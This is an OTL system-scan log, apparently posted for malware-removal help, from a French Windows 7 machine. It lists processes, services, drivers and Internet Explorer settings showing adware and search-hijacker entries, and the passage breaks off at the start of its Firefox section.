OTL logfile created on: 2/23/2014 11:04:39 AM - Run 1 OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\APPE-ATELIER\Downloads Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation Internet Explorer (Version = 9.11.9600.16518) Locale: 00000409 | Country: France | Language: FRA | Date Format: dd/MM/yyyy 2.90 Gb Total Physical Memory | 1.90 Gb Available Physical Memory | 65.59% Memory free 5.80 Gb Paging File | 4.56 Gb Available in Paging File | 78.49% Paging File free Paging file location(s): ?:\pagefile.sys [binary data] %SystemDrive% = C: | %SystemRoot% = C:\windows | %ProgramFiles% = C:\Program Files Drive C: | 280.79 Gb Total Space | 229.76 Gb Free Space | 81.82% Space Free | Partition Type: NTFS Computer Name: ATELIER | User Name: APPE-ATELIER | Logged in as Administrator. Boot Mode: Normal | Scan Mode: All users Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days [color=#E56717]========== Processes (SafeList) ==========[/color] PRC - [2014/02/23 11:01:44 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\APPE-ATELIER\Downloads\OTL.exe PRC - [2014/02/22 19:24:01 | 000,111,392 | ---- | M] () -- C:\Program Files\FindRight\bin\utilFindRight.exe PRC - [2014/02/21 05:26:24 | 000,111,392 | ---- | M] () -- C:\Program Files\FindRight\updateFindRight.exe PRC - [2014/02/06 12:29:56 | 003,153,904 | ---- | M] () -- C:\Users\APPE-ATELIER\AppData\Local\fst_fr_83\upfst_fr_83.exe PRC - [2014/02/04 08:36:10 | 000,090,696 | ---- | M] () -- C:\Program Files\HomeTab\WBrowserDefender.exe PRC - [2014/01/09 08:16:20 | 000,034,376 | ---- | M] () -- C:\Program Files\HomeTab\WBrowserProductivity.exe PRC - [2014/01/08 07:06:02 | 001,265,608 | ---- | M] (Objectify Media Inc) -- C:\Program Files\Web Protect\PCProtect.exe PRC - [2013/12/13 09:39:10 | 000,309,328 | ---- | M] (Google Inc.) -- C:\Program Files\Google\Google Toolbar\GoogleToolbarUser_32.exe PRC - [2013/03/07 00:32:44 | 004,767,304 | ---- | M] (AVAST Software) -- C:\Program Files\Alwil Software\Avast5\AvastUI.exe PRC - [2013/03/07 00:32:44 | 000,045,248 | ---- | M] (AVAST Software) -- C:\Program Files\Alwil Software\Avast5\AvastSvc.exe PRC - [2012/11/23 03:48:41 | 000,049,152 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\taskhost.exe PRC - [2011/02/25 06:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe PRC - [2009/07/14 02:14:29 | 000,017,408 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\PrintIsolationHost.exe [color=#E56717]========== Modules (No Company Name) ==========[/color] MOD - [2014/02/12 13:21:49 | 001,051,136 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Management\4412bbbb473c356b5ea3e1ea13b25f52\System.Management.ni.dll MOD - [2014/02/12 13:18:51 | 001,840,640 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Web.Services\b0f9a4f138cc569a7526f97b93808d3e\System.Web.Services.ni.dll MOD - [2014/02/12 13:18:40 | 000,628,224 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.EnterpriseSe#\faf3ae85f2470505e1b32d2154de60ef\System.EnterpriseServices.ni.dll MOD - [2014/02/12 13:18:40 | 000,627,200 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Transactions\cd3556d1162e8f7df77611c9c4253f7c\System.Transactions.ni.dll MOD - [2014/02/12 13:18:39 | 006,611,456 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Data\fe1942c05eda4f9744f80afb4ae76a2d\System.Data.ni.dll MOD - [2014/02/12 13:18:08 | 012,436,480 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\8bc548587e91ecf0552a40e47bbf99cc\System.Windows.Forms.ni.dll MOD - [2014/02/12 13:18:00 | 001,593,344 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\5c24d3b0041ebf4f48a93615b9fa3de9\System.Drawing.ni.dll MOD - [2014/02/12 13:17:57 | 000,025,600 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\Accessibility\4f5069e6497e5e6a381ab6aadf05d6a5\Accessibility.ni.dll MOD - [2014/02/12 13:17:35 | 005,464,064 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Xml\217ece46920546d718414291d463bb1c\System.Xml.ni.dll MOD - [2014/02/12 13:17:31 | 000,978,432 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\5b6ddf934128d538cd5cd77bf4209b93\System.Configuration.ni.dll MOD - [2014/02/12 13:17:30 | 007,989,760 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\System\b3a78269847005365001c33870cd121f\System.ni.dll MOD - [2014/02/12 13:17:22 | 011,499,520 | ---- | M] () -- C:\windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ede2c6c842840e009f01bcc74fa4c457\mscorlib.ni.dll MOD - [2014/02/06 12:29:56 | 003,153,904 | ---- | M] () -- C:\Users\APPE-ATELIER\AppData\Local\fst_fr_83\upfst_fr_83.exe MOD - [2014/02/04 08:36:10 | 000,090,696 | ---- | M] () -- C:\Program Files\HomeTab\WBrowserDefender.exe MOD - [2014/02/04 06:36:36 | 000,121,416 | ---- | M] () -- C:\Program Files\HomeTab\InstallHelper.dll MOD - [2014/01/17 12:53:23 | 000,433,000 | ---- | M] () -- C:\program files\plus-hd-5.7\Plus-HD-5.7-buttonutil.dll MOD - [2014/01/09 08:16:20 | 000,034,376 | ---- | M] () -- C:\Program Files\HomeTab\WBrowserProductivity.exe MOD - [2013/04/13 14:15:42 | 000,911,128 | ---- | M] () -- C:\windows\assembly\GAC_32\System.Data.SQLite\1.0.66.0__db937bc2d44ff139\System.Data.SQLite.dll MOD - [2010/11/13 01:58:32 | 000,311,296 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_fr_b77a5c561934e089\mscorlib.resources.dll MOD - [2010/11/05 03:00:10 | 000,212,992 | ---- | M] () -- C:\windows\assembly\GAC_MSIL\System.resources\2.0.0.0_fr_b77a5c561934e089\System.resources.dll MOD - [2010/11/05 02:58:05 | 002,927,616 | ---- | M] () -- C:\windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll MOD - [2009/06/10 22:23:19 | 000,261,632 | ---- | M] () -- C:\windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll [color=#E56717]========== Services (SafeList) ==========[/color] SRV - [2014/02/22 19:24:01 | 000,111,392 | ---- | M] () [Auto | Running] -- C:\Program Files\FindRight\bin\utilFindRight.exe -- (Util FindRight) SRV - [2014/02/21 05:26:24 | 000,111,392 | ---- | M] () [Auto | Running] -- C:\Program Files\FindRight\updateFindRight.exe -- (Update FindRight) SRV - [2014/02/16 16:15:27 | 000,146,920 | ---- | M] (SaveSense) [Disabled | Stopped] -- C:\Program Files\SaveSenseLive\Update\SaveSenseLive.exe -- (savesenselivem) SRV - [2014/02/16 16:15:27 | 000,146,920 | ---- | M] (SaveSense) [Disabled | Stopped] -- C:\Program Files\SaveSenseLive\Update\SaveSenseLive.exe -- (savesenselive) SRV - [2014/02/13 01:36:33 | 000,118,896 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance) SRV - [2014/02/11 19:19:22 | 000,493,568 | ---- | M] (Cherished Technololgy LIMITED) [Disabled | Stopped] -- C:\ProgramData\WPM\wprotectmanager.exe -- (Wpm) SRV - [2014/02/06 10:47:18 | 000,108,032 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\windows\System32\IEEtwCollector.exe -- (IEEtwCollectorService) SRV - [2014/01/14 10:04:32 | 000,508,016 | ---- | M] (Cherished Technololgy LIMITED) [Disabled | Stopped] -- C:\ProgramData\IePluginService\PluginService.exe -- (IePluginService) SRV - [2014/01/08 07:06:02 | 001,265,608 | ---- | M] (Objectify Media Inc) [On_Demand | Running] -- C:\Program Files\Web Protect\PCProtect.exe -- (PCProtect) SRV - [2013/12/21 07:04:16 | 000,065,432 | ---- | M] (Adobe Systems Incorporated) [Disabled | Stopped] -- C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice) SRV - [2013/11/25 19:07:48 | 000,355,584 | ---- | M] (TuneUp Software GmbH) [Disabled | Stopped] -- C:\Windows\System32\TuneUpDefragService.exe -- (TuneUp.Defrag) SRV - [2013/05/27 05:57:27 | 000,680,960 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\mpsvc.dll -- (WinDefend) SRV - [2013/04/26 21:56:48 | 000,463,656 | ---- | M] (AnchorFree Inc.) [Disabled | Stopped] -- C:\Program Files\Hotspot Shield\HssWPR\hsssrv.exe -- (HssSrv) SRV - [2013/04/24 20:29:56 | 000,078,512 | ---- | M] () [Disabled | Stopped] -- C:\Program Files\Hotspot Shield\bin\HssTrayService.EXE -- (HssTrayService) SRV - [2013/04/12 11:37:24 | 000,031,744 | ---- | M] () [Disabled | Stopped] -- C:\Program Files\SoftwareUpdater\UpdaterService.exe -- (SrvUpdater) SRV - [2013/03/07 00:32:44 | 000,045,248 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Program Files\Alwil Software\Avast5\AvastSvc.exe -- (avast! Antivirus) SRV - [2012/03/25 19:00:54 | 000,254,034 | ---- | M] (IDT, Inc.) [Disabled | Stopped] -- C:\Program Files\IDT\WDM\STacSV.exe -- (STacSV) SRV - [2012/03/25 19:00:53 | 000,081,920 | ---- | M] (Andrea Electronics Corporation) [Disabled | Stopped] -- C:\Program Files\IDT\WDM\aestsrv.exe -- (AESTFilters) SRV - [2011/10/17 15:51:54 | 000,013,824 | ---- | M] (Hewlett-Packard Company) [Disabled | Stopped] -- C:\Program Files\HP\HPBDSService\HPBDSService.exe -- (HP DS Service) SRV - [2011/09/09 17:10:28 | 000,086,072 | ---- | M] (Hewlett-Packard Company) [Disabled | Stopped] -- C:\Program Files\Hewlett-Packard\HP Support Framework\hpsa_service.exe -- (HP Support Assistant Service) SRV - [2011/03/28 17:07:50 | 000,094,264 | ---- | M] (Hewlett-Packard Company) [Disabled | Stopped] -- C:\Program Files\Hewlett-Packard\Shared\HPDrvMntSvc.exe -- (HPDrvMntSvc.exe) SRV - [2010/12/11 18:58:00 | 001,343,400 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\Wat\WatAdminSvc.exe -- (WatAdminSvc) SRV - [2010/01/28 17:21:26 | 000,265,272 | ---- | M] (Hewlett-Packard Company) [Disabled | Stopped] -- C:\Program Files\Hewlett-Packard\HP HotKey Support\hpHotkeyMonitor.exe -- (hpHotkeyMonitor) SRV - [2010/01/08 22:55:54 | 000,354,840 | ---- | M] (Intel Corporation) [Disabled | Stopped] -- C:\Program Files\Intel\Intel Matrix Storage Manager\IAANTMon.exe -- (IAANTMON) SRV - [2009/11/23 19:08:10 | 001,120,752 | ---- | M] (Sonic Solutions) [Disabled | Stopped] -- c:\Program Files\Common Files\Roxio Shared\10.0\SharedCOM\RoxMediaDB10.exe -- (RoxMediaDB10) SRV - [2009/11/02 21:12:02 | 000,014,336 | ---- | M] (LSI Corporation) [Disabled | Stopped] -- C:\Program Files\LSI SoftModem\agrsmsvc.exe -- (AgereModemAudio) SRV - [2009/07/14 02:16:13 | 000,025,088 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\sensrsvc.dll -- (SensrSvc) SRV - [2008/05/29 09:28:54 | 000,028,416 | ---- | M] (TuneUp Software GmbH) [Auto | Stopped] -- C:\Windows\System32\uxtuneup.dll -- (UxTuneUp) SRV - [2007/07/24 19:15:14 | 000,185,632 | ---- | M] (Protexis Inc.) [Disabled | Stopped] -- c:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe -- (PSI_SVC_2) [color=#E56717]========== Driver Services (SafeList) ==========[/color] DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\GEARAspiWDM.sys -- (GEARAspiWDM) DRV - [2014/01/08 07:09:36 | 000,020,480 | ---- | M] () [Kernel | System | Running] -- C:\Windows\System32\drivers\pcwatch.sys -- (pcwatch) DRV - [2013/12/26 10:12:36 | 000,040,776 | ---- | M] (Malwarebytes Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\mbamswissarmy.sys -- (MBAMSwissArmy) DRV - [2013/04/24 20:25:44 | 000,037,064 | ---- | M] (Anchorfree Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\taphss6.sys -- (taphss6) DRV - [2013/04/24 20:12:34 | 000,040,648 | ---- | M] (AnchorFree Inc.) [Kernel | System | Running] -- C:\Windows\System32\drivers\hssdrv6.sys -- (HssDRV6) DRV - [2013/03/07 00:33:24 | 000,765,736 | ---- | M] (AVAST Software) [File_System | System | Stopped] -- C:\windows\System32\drivers\aswSnx.sys -- (aswSnx) DRV - [2013/03/07 00:33:24 | 000,368,176 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\windows\System32\drivers\aswSP.sys -- (aswSP) DRV - [2013/03/07 00:33:24 | 000,164,736 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\windows\System32\drivers\aswVmm.sys -- (aswVmm) DRV - [2013/03/07 00:33:24 | 000,062,376 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\windows\System32\drivers\aswTdi.sys -- (aswTdi) DRV - [2013/03/07 00:33:24 | 000,049,248 | ---- | M] () [Kernel | Boot | Running] -- C:\windows\System32\drivers\aswRvrt.sys -- (aswRvrt) DRV - [2013/03/07 00:33:23 | 000,066,336 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\System32\drivers\aswMonFlt.sys -- (aswMonFlt) DRV - [2013/03/07 00:33:23 | 000,060,656 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswRdr2.sys -- (aswRdr) DRV - [2013/03/07 00:33:22 | 000,029,816 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\windows\System32\drivers\aswFsBlk.sys -- (aswFsBlk) DRV - [2012/10/30 23:51:56 | 000,020,624 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\windows\System32\drivers\aswKbd.sys -- (aswKbd) DRV - [2012/03/25 19:00:55 | 000,431,616 | ---- | M] (IDT, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\stwrt.sys -- (STHDA) DRV - [2011/05/18 08:09:04 | 000,040,320 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\dc3d.sys -- (dc3d) DRV - [2010/11/20 11:24:41 | 000,052,224 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\TsUsbFlt.sys -- (TsUsbFlt) DRV - [2010/11/20 10:59:44 | 000,035,968 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\winusb.sys -- (WinUsb) DRV - [2010/04/27 09:24:50 | 001,763,968 | ---- | M] () [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\snp2uvc.sys -- (SNP2UVC) DRV - [2010/01/20 02:55:06 | 000,996,896 | ---- | M] (Realtek Semiconductor Corporation ) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\rtl8192se.sys -- (rtl8192se) DRV - [2009/11/02 21:11:56 | 001,163,328 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\AGRSM.sys -- (AgereSoftModem) DRV - [2009/07/16 21:16:50 | 000,015,872 | ---- | M] (Hewlett-Packard Development Company, L.P.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\HpqKbFiltr.sys -- (HpqKbFiltr) DRV - [2009/07/14 00:52:10 | 000,014,336 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\vwifimp.sys -- (vwifimp) DRV - [2009/07/14 00:12:52 | 000,030,720 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\tpm.sys -- (TPM) DRV - [2009/07/09 22:44:50 | 000,122,880 | ---- | M] (Intel(R) Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\IntcHdmi.sys -- (IntcHdmiAddService) [color=#E56717]========== Standard Registry (SafeList) ==========[/color] [color=#E56717]========== Internet Explorer ==========[/color] IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.awesomehp.com/?type=hp&ts=1392142712&from=tugs&uid=TOSHIBAXMK3256GSY_407CFENYSXX407CFENYS IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://search.certified-toolbar.com?si=62606&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&st=chrome&q= IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = http://search.certified-toolbar.com?si=62606&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&st=chrome&q= IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://search.certified-toolbar.com?si=62606&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&st=chrome&q= IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Default_Page_URL = about:newtab IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:newtab IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://search.certified-toolbar.com?si=62606&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&st=chrome&q= IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Search Bar = http://search.certified-toolbar.com?si=62606&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&st=chrome&q= IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Search Page = http://search.certified-toolbar.com?si=62606&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&st=chrome&q= IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Start Default_Page_URL = about:newtab IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Start Page = about:newtab IE - HKLM\..\URLSearchHook: {09a07b02-f491-4b6b-bfc9-684a624f4f3b} - C:\Program Files\Reverso\prxtbReve.dll (Conduit Ltd.) IE - HKLM\..\URLSearchHook: {6ec85fcf-87ad-41d7-ae1f-f116f8ad4848} - C:\Program Files\Avanquest_FR\prxtbAva2.dll (Conduit Ltd.) IE - HKLM\..\SearchScopes,DefaultScope = {afdbddaa-5d3f-42ee-b79c-185a7020515b} IE - HKLM\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://www.awesomehp.com/web/?type=ds&ts=1392142712&from=tugs&uid=TOSHIBAXMK3256GSY_407CFENYSXX407CFENYS&q={searchTerms} IE - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://search.certified-toolbar.com?si=62606&st=bs&tid=6533&ver=4.9&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&q={searchTerms} IE - HKLM\..\SearchScopes\{80B7D2F3-3D57-4CF6-A8A6-3292946EC73F}: "URL" = http://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox IE - HKLM\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2101}: "URL" = http://www.searchqu.com/web?src=ieb&appid=0&systemid=101&sr=0&q={searchTerms} IE - HKLM\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2406}: "URL" = http://dts.search-results.com/sr?src=ieb&appid=189&systemid=406&sr=0&q={searchTerms} IE - HKLM\..\SearchScopes\{afdbddaa-5d3f-42ee-b79c-185a7020515b}: "URL" = http://search.certified-toolbar.com?si=62606&st=bs&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&q={searchTerms} IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://search.certified-toolbar.com?si=62606&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&st=chrome&q= IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = http://search.certified-toolbar.com?si=62606&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&st=chrome&q= IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://search.certified-toolbar.com?si=62606&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&st=chrome&q= IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Internet Explorer\Main,SearchDefaultBranded = 1 IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Default_Page_URL = about:newtab IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.aliceadsl.fr/ IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://fr.msn.com/ IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = fr-FR IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://search.certified-toolbar.com?si=62606&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&st=chrome&q= IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Internet Explorer\Search,Search Bar = http://search.certified-toolbar.com?si=62606&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&st=chrome&q= IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Internet Explorer\Search,Search Page = http://search.certified-toolbar.com?si=62606&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&st=chrome&q= IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Internet Explorer\Search,Start Default_Page_URL = about:newtab IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\SOFTWARE\Microsoft\Internet Explorer\Search,Start Page = about:newtab IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes,DefaultScope = {afdbddaa-5d3f-42ee-b79c-185a7020515b} IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9}: "URL" = http://search.conduit.com/Results.aspx?ctid=CT3324332&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=4&UP=SP924F91EA-BE8A-4F23-920E-4F372C22FB6E&q={searchTerms}&SSPV= IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{0D7562AE-8EF6-416d-A838-AB665251703A}: "URL" = http://start.facemoods.com/?a=aed&s={searchTerms}&f=4 IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9}: "URL" = http://search.certified-toolbar.com?si=62606&st=bs&tid=6533&ver=4.9&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&q={searchTerms} IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{2331091A-2BE8-40D5-80E7-549466B352FE}: "URL" = http://search.softonic.com/MOY00005/tb_v1?q={searchTerms}&SearchSource=4&cc=&mi=4c91cd4a00000000000070f1a14163a3&toi=16087&r=33 IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://www.awesomehp.com/web/?type=ds&ts=1392142712&from=tugs&uid=TOSHIBAXMK3256GSY_407CFENYSXX407CFENYS&q={searchTerms} IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7&rlz=1I7GGHP_frFR473 IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{80B7D2F3-3D57-4CF6-A8A6-3292946EC73F}: "URL" = http://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2101}: "URL" = http://www.searchqu.com/web?src=ieb&appid=0&systemid=101&sr=0&q={searchTerms} IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2406}: "URL" = http://dts.search-results.com/sr?src=ieb&appid=189&systemid=406&sr=0&q={searchTerms} IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{9D5BD211-422C-4164-9298-BB4186A30F31}: "URL" = http://www.bing.com/search?q={searchTerms}&mkt=fr-FR&form=MKTIE9 IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{AFDBDDAA-5D3F-42EE-B79C-185A7020515B}: "URL" = http://search.certified-toolbar.com?si=62606&st=bs&tid=6533&ver=5.7&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&q={searchTerms} IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{B39C149F-B614-4765-AB0E-DFC7A0D1DEF6}: "URL" = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT2089011&CUI=UN15040909481511029&UM=1 IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{b41306c6-96d0-442a-bcc4-b0f621e82ce9}: "URL" = http://www.fissa.com/fr/results/?s=b&c=11010210965&suid=EmN4rTV0o&d=5&pid=30&q={searchTerms} IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{B521A443-6FE6-49B9-9101-B2D35E268160}: "URL" = http://asksearch.ask.com/redirect?client=ie&src=kw&tb=KMPV6&itbv=11.8.1.343&o=APN10749&locale=fr_FR&apn_uid=0DABCBC1-74C3-4EDE-ACF6-ACAC0B274F0A&apn_ptnrs=^AUC&apn_dtid=^YYYYYY^YY^FR&apn_dbr=ie_10.0.9200.16576&doi=2013-05-31&q={searchTerms}& IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{B5E88050-BE39-42EE-9385-CF79402863A4}: "URL" = http://search.certified-toolbar.com?si=62606&st=bs&tid=6533&ver=4.6&ts=1377589244254.000007&tguid=62606-6533-1377589244254-6B98A6F067D7FFE4FE0E4F558E5BB9B6&q={searchTerms} IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\..\SearchScopes\{EC84EDD1-3C74-462B-B589-EDB2B5A014EA}: "URL" = http://start.funmoods.com/results.php?f=4&a=ironto&q={searchTerms} IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = IE - HKU\S-1-5-21-784627312-1147448306-2395707560-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "AutoConfigURL" = http://cdn1.browsersecurity.net/safe/cloud.js?si=62606&tid=6533 [color=#E56717]========== FireFox ==========[/color] FF - prefs.js..browser.search.defaultengine: "Web Search" FF - prefs.js..browser.search.defaultthis.engineName: "" FF - 